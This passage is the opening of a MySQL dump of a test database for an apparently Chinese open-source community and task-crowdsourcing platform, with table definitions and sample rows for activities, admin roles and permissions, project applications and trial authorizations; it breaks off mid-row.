7163 lines
7.6 MiB
7163 lines
7.6 MiB
-- MySQL dump 10.13 Distrib 5.7.33, for Linux (x86_64)
|
||
--
|
||
-- Host: 10.9.70.25 Database: test_osredmweb
|
||
-- ------------------------------------------------------
|
||
-- Server version 5.6.20-ucloudrel1-log
|
||
|
||
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
|
||
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
|
||
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
|
||
/*!40101 SET NAMES utf8 */;
|
||
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
|
||
/*!40103 SET TIME_ZONE='+00:00' */;
|
||
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
|
||
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
|
||
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
|
||
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
|
||
|
||
--
|
||
-- Table structure for table `about_infos`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `about_infos`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `about_infos` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`content` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `about_infos`
|
||
--
|
||
|
||
LOCK TABLES `about_infos` WRITE;
|
||
/*!40000 ALTER TABLE `about_infos` DISABLE KEYS */;
|
||
INSERT INTO `about_infos` VALUES (1,48,'红山开源是一个依托互联网群体智慧实现世界范围内资源深度融合、开放共享和协同创新的开源社区,是集开源项目演化发展、科研任务众包、竞赛组织选拔和社区开放交流为一体的创新科研服务平台。红山开源致力于打造一个“开放、汇聚、协同、众创”的生态空间。','2020-08-19 17:17:39','2020-09-14 18:49:05');
|
||
/*!40000 ALTER TABLE `about_infos` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `activities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `activities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `activities` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`act_id` int(11) NOT NULL,
|
||
`act_type` varchar(255) NOT NULL,
|
||
`user_id` int(11) NOT NULL,
|
||
`activity_container_id` int(11) DEFAULT NULL,
|
||
`activity_container_type` varchar(255) DEFAULT '',
|
||
`created_at` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_activities_on_user_id` (`user_id`),
|
||
KEY `index_activities_on_act_id_and_act_type` (`act_id`,`act_type`),
|
||
KEY `index_activities_on_user_id_and_act_type` (`user_id`,`act_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=140 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `activities`
|
||
--
|
||
|
||
LOCK TABLES `activities` WRITE;
|
||
/*!40000 ALTER TABLE `activities` DISABLE KEYS */;
|
||
INSERT INTO `activities` VALUES (1,1,'Issue',1,3,'Project','2018-07-18 16:50:44'),(2,2,'Issue',1,3,'Project','2018-07-19 09:48:42'),(3,3,'Issue',1,3,'Project','2018-07-19 09:52:32'),(4,4,'Issue',1,8,'Project','2018-07-20 10:01:50'),(5,5,'Issue',1,8,'Project','2018-07-20 10:04:20'),(6,6,'Issue',5,13,'Project','2018-07-20 10:17:47'),(7,7,'Issue',5,13,'Project','2018-07-20 10:18:02'),(8,8,'Issue',5,13,'Project','2018-07-20 10:18:18'),(9,9,'Issue',5,11,'Project','2018-07-20 10:19:30'),(10,10,'Issue',5,11,'Project','2018-07-20 10:19:50'),(11,11,'Issue',5,11,'Project','2018-07-20 10:21:01'),(12,12,'Issue',5,12,'Project','2018-07-20 10:21:31'),(13,13,'Issue',5,12,'Project','2018-07-20 10:22:04'),(14,14,'Issue',5,12,'Project','2018-07-20 10:22:24'),(15,15,'Issue',5,12,'Project','2018-07-20 10:22:40'),(17,17,'Issue',6,18,'Project','2018-07-20 14:51:24'),(18,18,'Issue',5,12,'Project','2018-07-23 14:35:05'),(21,21,'Issue',1,18,'Project','2018-08-03 17:50:18'),(22,22,'Issue',6,19,'Project','2018-08-03 18:35:14'),(24,24,'Issue',1,21,'Project','2018-08-03 18:52:08'),(25,25,'Issue',5,13,'Project','2018-08-08 09:29:58'),(26,26,'Issue',1,32,'Project','2018-11-14 14:54:47'),(27,27,'Issue',1,76,'Project','2018-11-22 23:27:43'),(28,28,'Issue',1,76,'Project','2018-11-23 00:37:09'),(29,29,'Issue',1,76,'Project','2018-11-23 00:37:57'),(30,30,'Issue',19,81,'Project','2019-01-15 15:08:31'),(31,31,'Issue',19,94,'Project','2019-01-21 10:17:24'),(32,32,'Issue',1,95,'Project','2019-01-21 15:39:03'),(33,33,'Issue',1,95,'Project','2019-01-21 15:43:00'),(34,34,'Issue',1,95,'Project','2019-01-21 15:44:48'),(35,35,'Issue',1,100,'Project','2019-01-22 00:35:19'),(36,36,'Issue',1,100,'Project','2019-01-22 00:37:13'),(37,37,'Issue',1,100,'Project','2019-01-22 00:39:45'),(38,38,'Issue',1,100,'Project','2019-01-22 00:40:32'),(39,39,'Issue',1,100,'Project','2019-01-22 00:49:47'),(40,40,'Issue',1,95,'Project','2019-01-22 00:50:45'),(41,41,'Issue',1,101,'Project','2019-01-22 09:14:03'),(42,42,'Issue',1,101,'Project','2019-01-22 09:19:46'),(43,43,'Issue',26,120,'Project','2019-03-05 15:49:52'),(44,44,'Issue',43,130,'Project','2019-04-17 10:07:15'),(45,45,'Issue',26,130,'Project','2019-04-17 13:19:30'),(46,46,'Issue',26,130,'Project','2019-04-17 14:23:09'),(47,47,'Issue',26,130,'Project','2019-04-18 17:52:48'),(48,48,'Issue',26,130,'Project','2019-04-29 11:20:03'),(49,49,'Issue',26,130,'Project','2019-04-29 11:30:13'),(50,50,'Issue',26,130,'Project','2019-04-29 11:42:44'),(51,51,'Issue',46,128,'Project','2019-08-08 08:48:02'),(52,52,'Issue',49,134,'Project','2019-08-08 15:34:53'),(53,53,'Issue',50,134,'Project','2019-08-13 16:32:01'),(54,54,'Issue',46,133,'Project','2019-08-14 08:17:58'),(55,55,'Issue',50,141,'Project','2019-08-16 09:24:33'),(56,56,'Issue',50,144,'Project','2019-08-23 15:09:37'),(57,57,'Issue',50,141,'Project','2019-09-02 08:56:25'),(59,59,'Issue',20,155,'Project','2019-10-08 10:44:52'),(60,60,'Issue',20,161,'Project','2019-10-08 11:00:58'),(61,61,'Issue',20,161,'Project','2019-10-08 13:47:01'),(62,62,'Issue',46,169,'Project','2019-10-23 16:14:16'),(63,63,'Issue',49,169,'Project','2019-10-23 16:45:23'),(64,64,'Issue',61,188,'Project','2019-10-31 16:54:19'),(65,65,'Issue',46,188,'Project','2019-10-31 16:57:23'),(66,66,'Issue',46,188,'Project','2019-10-31 17:02:37'),(67,67,'Issue',61,188,'Project','2019-10-31 17:02:39'),(68,68,'Issue',46,188,'Project','2019-10-31 17:04:30'),(69,69,'Issue',46,192,'Project','2019-11-06 16:38:25'),(70,70,'Issue',49,194,'Project','2019-11-07 11:14:16'),(71,71,'Issue',49,194,'Project','2019-11-07 11:14:16'),(72,72,'Issue',46,194,'Project','2019-11-07 11:15:06'),(73,73,'Issue',46,199,'Project','2019-11-07 16:05:58'),(74,74,'Issue',64,199,'Project','2019-11-07 16:21:16'),(75,75,'Issue',65,199,'Project','2019-11-08 10:59:33'),(76,76,'Issue',63,199,'Project','2019-11-08 11:10:36'),(77,77,'Issue',65,199,'Project','2019-11-08 11:14:43'),(78,78,'Issue',64,199,'Project','2019-11-08 11:15:17'),(79,79,'Issue',63,199,'Project','2019-11-08 11:15:37'),(80,80,'Issue',64,199,'Project','2019-11-08 11:15:58'),(81,81,'Issue',64,199,'Project','2019-11-08 11:16:33'),(82,82,'Issue',49,199,'Project','2019-11-08 11:16:41'),(83,83,'Issue',64,199,'Project','2019-11-08 11:17:09'),(84,84,'Issue',64,199,'Project','2019-11-08 11:17:49'),(85,85,'Issue',63,199,'Project','2019-11-08 11:18:06'),(86,86,'Issue',64,199,'Project','2019-11-08 11:18:44'),(87,87,'Issue',65,199,'Project','2019-11-08 11:19:24'),(88,88,'Issue',49,199,'Project','2019-11-08 11:21:08'),(89,89,'Issue',65,199,'Project','2019-11-08 11:22:20'),(91,91,'Issue',46,199,'Project','2019-11-08 11:27:07'),(92,92,'Issue',46,199,'Project','2019-11-08 11:28:56'),(93,93,'Issue',66,199,'Project','2019-11-10 12:44:07'),(94,94,'Issue',66,199,'Project','2019-11-10 12:44:50'),(95,95,'Issue',66,199,'Project','2019-11-10 12:45:33'),(96,96,'Issue',66,199,'Project','2019-11-10 12:46:08'),(97,97,'Issue',46,208,'Project','2019-11-11 09:59:55'),(98,98,'Issue',46,199,'Project','2019-11-11 10:28:02'),(99,99,'Issue',66,199,'Project','2019-11-11 10:29:15'),(100,100,'Issue',64,199,'Project','2019-11-11 10:33:16'),(101,101,'Issue',64,199,'Project','2019-11-11 10:35:21'),(102,102,'Issue',64,232,'Project','2019-11-11 17:13:17'),(103,103,'Issue',49,234,'Project','2019-11-12 09:05:56'),(104,104,'Issue',49,235,'Project','2019-11-12 09:18:38'),(105,105,'Issue',49,237,'Project','2019-11-12 10:16:03'),(108,108,'Issue',46,199,'Project','2019-11-22 09:27:07'),(110,110,'Issue',46,199,'Project','2019-11-22 10:30:35'),(111,111,'Issue',76,251,'Project','2020-02-04 22:00:33'),(112,112,'Issue',81,255,'Project','2020-02-11 09:54:10'),(113,113,'Issue',81,255,'Project','2020-02-11 10:04:09'),(114,114,'Issue',81,255,'Project','2020-02-11 10:05:52'),(115,115,'Issue',81,255,'Project','2020-02-11 10:07:24'),(116,116,'Issue',81,255,'Project','2020-02-11 10:10:24'),(117,117,'Issue',81,255,'Project','2020-02-11 10:11:35'),(118,118,'Issue',81,255,'Project','2020-02-11 10:12:28'),(119,119,'Issue',81,255,'Project','2020-02-11 10:14:14'),(120,120,'Issue',81,255,'Project','2020-02-11 10:15:28'),(121,121,'Issue',81,255,'Project','2020-02-11 10:19:27'),(122,122,'Issue',81,255,'Project','2020-02-11 10:19:58'),(123,123,'Issue',81,255,'Project','2020-02-11 10:22:01'),(124,124,'Issue',81,255,'Project','2020-02-11 10:22:04'),(125,125,'Issue',81,255,'Project','2020-02-11 10:22:56'),(126,126,'Issue',81,255,'Project','2020-02-11 10:23:32'),(127,127,'Issue',81,255,'Project','2020-02-11 10:24:14'),(128,128,'Issue',81,255,'Project','2020-02-11 10:24:55'),(129,129,'Issue',81,255,'Project','2020-02-11 10:25:44'),(130,130,'Issue',81,255,'Project','2020-02-11 10:26:30'),(131,131,'Issue',81,255,'Project','2020-02-11 10:27:27'),(132,132,'Issue',99,255,'Project','2020-02-11 16:39:25'),(133,133,'Issue',99,255,'Project','2020-02-11 16:40:27'),(134,134,'Issue',99,255,'Project','2020-02-11 16:45:53'),(135,135,'Issue',99,255,'Project','2020-02-11 17:02:48'),(136,136,'Issue',83,255,'Project','2020-02-11 19:52:24'),(137,137,'Issue',83,255,'Project','2020-02-11 19:59:30'),(138,138,'Issue',83,255,'Project','2020-02-11 20:04:38'),(139,139,'Issue',83,255,'Project','2020-02-11 20:08:12');
|
||
/*!40000 ALTER TABLE `activities` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `activity_notifies`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `activity_notifies`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `activity_notifies` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`activity_container_id` int(11) DEFAULT NULL,
|
||
`activity_container_type` varchar(255) DEFAULT NULL,
|
||
`activity_id` int(11) DEFAULT NULL,
|
||
`activity_type` varchar(255) DEFAULT NULL,
|
||
`notify_to` int(11) DEFAULT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`is_read` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_an_notify_to` (`notify_to`),
|
||
KEY `index_an_created_on` (`created_on`),
|
||
KEY `index_an_activity_container_id` (`activity_container_id`,`activity_container_type`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `activity_notifies`
|
||
--
|
||
|
||
LOCK TABLES `activity_notifies` WRITE;
|
||
/*!40000 ALTER TABLE `activity_notifies` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `activity_notifies` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `admin_permissions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `admin_permissions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `admin_permissions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`category` varchar(255) DEFAULT NULL,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`role` bigint(20) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_admin_permissions_on_role` (`role`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `admin_permissions`
|
||
--
|
||
|
||
LOCK TABLES `admin_permissions` WRITE;
|
||
/*!40000 ALTER TABLE `admin_permissions` DISABLE KEYS */;
|
||
INSERT INTO `admin_permissions` VALUES (1,'project','delete_project',1),(2,'task','task_base_manager',2),(3,'task','task_list',4),(4,'task','task_comment_approval',8),(5,'task','task_todo_list',16),(6,'task','task_approval',32),(7,'competition','competition_list',64),(8,'competition','competition_config',128),(9,'forum','forum_post',256),(10,'forum','forum_comment',512);
|
||
/*!40000 ALTER TABLE `admin_permissions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `admin_role_permissions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `admin_role_permissions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `admin_role_permissions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`admin_role_id` int(11) DEFAULT NULL,
|
||
`admin_permission_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `admin_role_permissions`
|
||
--
|
||
|
||
LOCK TABLES `admin_role_permissions` WRITE;
|
||
/*!40000 ALTER TABLE `admin_role_permissions` DISABLE KEYS */;
|
||
INSERT INTO `admin_role_permissions` VALUES (2,6,1),(3,6,2),(4,6,3),(5,6,5),(6,6,9),(7,6,10),(8,6,6),(9,6,4),(10,6,7),(11,6,8);
|
||
/*!40000 ALTER TABLE `admin_role_permissions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `admin_roles`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `admin_roles`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `admin_roles` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`role` bigint(20) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `admin_roles`
|
||
--
|
||
|
||
LOCK TABLES `admin_roles` WRITE;
|
||
/*!40000 ALTER TABLE `admin_roles` DISABLE KEYS */;
|
||
INSERT INTO `admin_roles` VALUES (6,'技术运维组',1023),(7,'运营管理组',0),(8,'内容监管组',0),(9,'贡献评估组',0),(10,'活动策划组',0);
|
||
/*!40000 ALTER TABLE `admin_roles` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `advertisements`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `advertisements`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `advertisements` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`link_to` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`published_at` datetime DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `advertisements`
|
||
--
|
||
|
||
LOCK TABLES `advertisements` WRITE;
|
||
/*!40000 ALTER TABLE `advertisements` DISABLE KEYS */;
|
||
INSERT INTO `advertisements` VALUES (1,'Advertisement_1','https://www.educoder.net/competitions',1,1,NULL,'2018-08-03 16:17:23','2018-08-24 09:34:13');
|
||
/*!40000 ALTER TABLE `advertisements` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `agreement_settings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `agreement_settings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `agreement_settings` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL,
|
||
`demander` tinyint(1) NOT NULL DEFAULT '1',
|
||
`custom_demander` varchar(255) DEFAULT NULL,
|
||
`agreement_content` text,
|
||
`demander_entity` tinyint(1) NOT NULL DEFAULT '1',
|
||
`task_title` tinyint(1) NOT NULL DEFAULT '1',
|
||
`task_content` tinyint(1) NOT NULL DEFAULT '1',
|
||
`task_attachments` tinyint(1) NOT NULL DEFAULT '1',
|
||
`task_bounty` tinyint(1) NOT NULL DEFAULT '1',
|
||
`task_mode` tinyint(1) NOT NULL DEFAULT '1',
|
||
`additional_info` text,
|
||
`candidate_entity` tinyint(1) NOT NULL DEFAULT '1',
|
||
`candidate_bank_info` tinyint(1) NOT NULL DEFAULT '1',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`task_additional` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `agreement_settings`
|
||
--
|
||
|
||
LOCK TABLES `agreement_settings` WRITE;
|
||
/*!40000 ALTER TABLE `agreement_settings` DISABLE KEYS */;
|
||
INSERT INTO `agreement_settings` VALUES (1,'是的',1,NULL,'的',1,1,1,1,1,1,'',1,1,'2019-11-22 16:53:00','2019-11-22 16:54:44',1);
|
||
/*!40000 ALTER TABLE `agreement_settings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `api_keys`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `api_keys`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `api_keys` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`access_token` varchar(255) DEFAULT NULL,
|
||
`expires_at` datetime DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`active` tinyint(1) DEFAULT '1',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_api_keys_on_user_id` (`user_id`),
|
||
KEY `index_api_keys_on_access_token` (`access_token`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `api_keys`
|
||
--
|
||
|
||
LOCK TABLES `api_keys` WRITE;
|
||
/*!40000 ALTER TABLE `api_keys` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `api_keys` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `applied_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `applied_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `applied_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`applied_id` int(11) DEFAULT NULL,
|
||
`applied_type` varchar(255) DEFAULT NULL,
|
||
`viewed` int(11) DEFAULT '0',
|
||
`status` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`applied_user_id` int(11) DEFAULT NULL,
|
||
`role` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=43 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `applied_messages`
|
||
--
|
||
|
||
LOCK TABLES `applied_messages` WRITE;
|
||
/*!40000 ALTER TABLE `applied_messages` DISABLE KEYS */;
|
||
INSERT INTO `applied_messages` VALUES (1,1,1,'ApplyAddDepartment',0,1,'2018-07-08 10:29:41','2018-07-08 10:29:41','国际贸易学院',4,NULL,NULL),(2,1,2,'ApplyAddDepartment',0,0,'2018-07-08 10:30:07','2018-07-08 10:30:07','计算机',4,NULL,NULL),(3,1,3159,'ApplyAddSchools',0,1,'2018-08-06 15:26:49','2018-08-06 15:26:49','绿色计算产业联盟',9,NULL,NULL),(4,9,1,'ApplyAddSchools',0,1,'2018-08-10 09:29:14','2018-08-10 09:29:14','绿色计算产业联盟',NULL,NULL,NULL),(5,4,1,'ApplyAddDepartment',0,1,'2018-08-10 09:31:40','2018-08-10 09:31:40','国际贸易学院',NULL,NULL,NULL),(6,1,3,'ApplyAddDepartment',0,0,'2018-08-10 09:35:22','2018-08-10 09:35:22','计算机1',5,NULL,NULL),(7,1,3160,'ApplyAddSchools',0,0,'2018-09-05 13:58:55','2018-09-05 13:58:55','微网云(深圳)技术有限公司',14,NULL,NULL),(8,1,3161,'ApplyAddSchools',0,0,'2018-09-07 12:38:28','2018-09-07 12:38:28','中国电子工业标准化技术协会',15,NULL,NULL),(9,1,3162,'ApplyAddSchools',0,0,'2018-10-12 17:40:22','2018-10-12 17:40:22','SKhynix',17,NULL,NULL),(10,26,1,'AppliedProject',1,7,'2019-04-17 09:55:37','2019-04-17 09:55:37',NULL,43,4,130),(16,46,7,'AppliedProject',1,7,'2019-10-23 16:27:47','2019-10-23 16:27:47',NULL,49,4,169),(17,32,8,'AppliedProject',1,7,'2019-10-28 15:09:08','2019-10-28 15:09:08',NULL,41,4,127),(18,50,9,'AppliedProject',1,7,'2019-10-29 16:29:20','2019-10-29 16:29:20',NULL,46,4,178),(24,49,15,'AppliedProject',1,7,'2019-11-07 15:53:31','2019-11-07 15:53:31',NULL,46,4,199),(25,49,16,'AppliedProject',1,7,'2019-11-11 09:02:34','2019-11-11 09:02:34',NULL,46,4,203),(26,49,17,'AppliedProject',1,7,'2019-11-11 09:12:52','2019-11-11 09:12:52',NULL,66,4,203),(27,48,17,'AppliedProject',1,7,'2019-11-11 09:12:52','2019-11-11 09:12:52',NULL,66,4,203),(35,49,25,'AppliedProject',1,7,'2019-11-11 17:08:49','2019-11-11 17:08:49',NULL,64,4,232),(41,77,31,'AppliedProject',1,7,'2020-03-19 15:15:56','2020-03-19 15:15:56',NULL,105,4,255),(42,76,31,'AppliedProject',1,7,'2020-03-19 15:15:56','2020-03-19 15:15:56',NULL,105,4,255);
|
||
/*!40000 ALTER TABLE `applied_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `applied_projects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `applied_projects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `applied_projects` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL,
|
||
`user_id` int(11) NOT NULL,
|
||
`role` int(11) DEFAULT '0',
|
||
`status` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=32 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `applied_projects`
|
||
--
|
||
|
||
LOCK TABLES `applied_projects` WRITE;
|
||
/*!40000 ALTER TABLE `applied_projects` DISABLE KEYS */;
|
||
INSERT INTO `applied_projects` VALUES (1,130,43,4,1),(7,169,49,4,1),(8,127,41,4,1),(9,178,46,4,1),(15,199,46,4,1),(16,203,46,4,1),(17,203,66,4,1),(25,232,64,4,1),(31,255,105,4,1);
|
||
/*!40000 ALTER TABLE `applied_projects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_actions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_actions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_actions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`reason` varchar(255) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`dealer_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`status` tinyint(4) DEFAULT '0',
|
||
`apply_reason` text,
|
||
`noticed` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_actions`
|
||
--
|
||
|
||
LOCK TABLES `apply_actions` WRITE;
|
||
/*!40000 ALTER TABLE `apply_actions` DISABLE KEYS */;
|
||
INSERT INTO `apply_actions` VALUES (1,1,NULL,NULL,'TrialAuthorization',NULL,'2018-07-08 09:20:11','2018-07-08 09:20:11',0,'开发测试\r\n',0),(2,21,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,1),(3,22,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,1),(4,23,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,1),(5,24,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,1),(6,25,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,1),(7,26,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,1),(8,27,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,1),(9,28,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,1),(10,29,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,1),(11,30,NULL,NULL,'TrialAuthorization',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,1),(12,31,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:19','2019-03-13 16:32:19',1,NULL,1),(13,32,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,1),(14,33,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:20','2019-03-13 